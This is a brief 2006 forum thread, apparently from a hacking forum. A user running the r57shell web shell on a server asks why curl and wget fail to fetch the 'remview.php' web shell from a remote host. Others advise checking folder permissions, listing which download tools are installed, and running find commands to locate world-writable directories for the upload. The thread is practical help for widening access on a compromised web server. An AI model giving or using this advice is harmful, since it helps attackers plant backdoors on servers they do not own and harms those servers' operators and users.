PDA

Просмотр полной версии : please help me !!!! r57shell


tranhkan
01.04.2006, 17:02
safe mode: off cURL: on mySQL : on
Disable functions : NONE

i can't do this command :
curl http://.../remview.php
wget http://.../remview.php

and upload ===> error uploading file remview.php
(ex: remview.php)

why ???????????????? :(

Utochka
01.04.2006, 17:15
The folder is closed for record, check up chmod folders!

m0nzt3r
01.04.2006, 22:37
first find out if there is setup wget curl lynx get links fetch
which wget curl fetch lynx links get
then see which is in the system, then look permissions and try to download remview

Dronga
02.04.2006, 01:58
I can avdvise you to try this commands.


find . -type d -perm -2 -ls
find ../ -type d -perm -2 -ls


They show you the folders wich you can upload.